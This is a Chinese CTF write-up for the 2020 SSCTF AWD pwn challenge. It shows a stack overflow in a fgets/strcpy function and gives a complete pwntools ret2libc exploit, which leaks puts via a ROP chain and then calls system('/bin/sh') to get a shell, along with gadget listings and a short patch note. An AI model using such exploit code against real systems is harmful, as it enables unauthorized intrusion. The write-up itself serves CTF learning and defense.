2020SSCTF-AWD-PWN

一台给了root权限的pwn

攻击

没有开启任何保护

[*] '/media/psf/Home/Desktop/AWD/\xe5\xa4\x87\xe4\xbb\xbd/pwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments

漏洞点在sub_40071D

char *__fastcall sub_40071D(char *a1, int a2)
{
  char s; // [rsp+12h] [rbp-Eh]

  fgets(&s, a2, stdin);
  return strcpy(a1, &s);
}

存在栈溢出，但是第一次只能覆盖到返回地址，所以我们把返回地址覆盖成这个函数，第二个参数就会变得很大

低四位要是大于0的数，不然fgets函数会直接返回0
然后进行栈溢出即可

#coding:utf-8
from pwn import *
import sys
context.log_level='debug'
debug = 1
file_name = './pwn'
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'
ip = ''
prot = ''
# if debug:
#     r = process(file_name)
#     libc = ELF(libc_name)
# else:
#     r = remote(ip,int(prot))
#     libc = ELF(libc_name)

file = ELF(file_name)

sl = lambda x : r.sendline(x)
sd = lambda x : r.send(x)
sla = lambda x,y : r.sendlineafter(x,y)
rud = lambda x : r.recvuntil(x,drop=True)
ru = lambda x : r.recvuntil(x)
li = lambda name,x : log.info(name+':'+hex(x))
ri = lambda  : r.interactive()
def debug():
    gdb.attach(r,"b *0x0000000040073F")
    raw_input()

# def attack():
puts_got = file.got['puts']
puts_plt = file.plt['puts']
p_rdi = 0x0000000000400833
pp_rsi = 0x0000000000400831
main_addr = 0x000000000400759
pwn_func = 0x00000000040071D
# debug()
while True:
    try:
        r = process(file_name)
        libc = ELF(libc_name)
        # debug()
        ru(" Who are you:\n")
        # sl("1")
        # payload = "\x11"*8#+p64(pwn_func)[:6]+p64(pp_rsi)[:6]
        '''
        "\x11"*16+p64(pwn_func)[:6]+p64(pp_rsi)[:6]
        '''
        payload = "a"*22+p64(pwn_func)[:6]
        # print payload.encode("hex")
        sd(payload)
        # print len(payload)
        # raw_input()
        # sd(p64(puts_plt))
        # sl("\x22"*21+p64(p_rdi)+p64(puts_got)+p64(puts_plt)+p64(pp_rsi)+p64(0x1000)+p64(0)+p64(main_addr))
        sl("\x22"*21+p64(pp_rsi)+p64(0x1000)+p64(0)+p64(p_rdi)+p64(puts_got)+p64(puts_plt)+p64(p_rdi)+p64(0x601220)+p64(pwn_func))
        libc_addr = u64(rud("\n")+"\x00\x00")-libc.symbols['puts']
        li("libc_addr",libc_addr)
        system = libc_addr+libc.symbols['system']
        binsh = 0x000000000018ce17+libc_addr
        # raw_input()
        payload = payload = "a"*22+p64(p_rdi)+p64(binsh)+p64(system)
        sl(payload)
        # ru(" Who are you:\n")
        # sd("a"*(0xe+8)+p64(puts_got)+p64(puts_got)+p64(puts_plt)+p64(pp_rsi)+p64(0x1000)+p64(0)+p64(0x1234))
        ri()
    except EOFError:
        r.close()

'''
0x000000000040082c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040082e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400830 : pop r14 ; pop r15 ; ret
0x0000000000400832 : pop r15 ; ret
0x000000000040082b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040082f : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400675 : pop rbp ; ret
0x0000000000400833 : pop rdi ; ret
0x0000000000400831 : pop rsi ; pop r15 ; ret
0x000000000040082d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400591 : ret
0x00000000004006a5 : ret 0xc148
Unique gadgets found: 12
'''

修补

修补就很好修了，直接把第一次调用函数sub_40071D的第二个参数改小一些就可以啦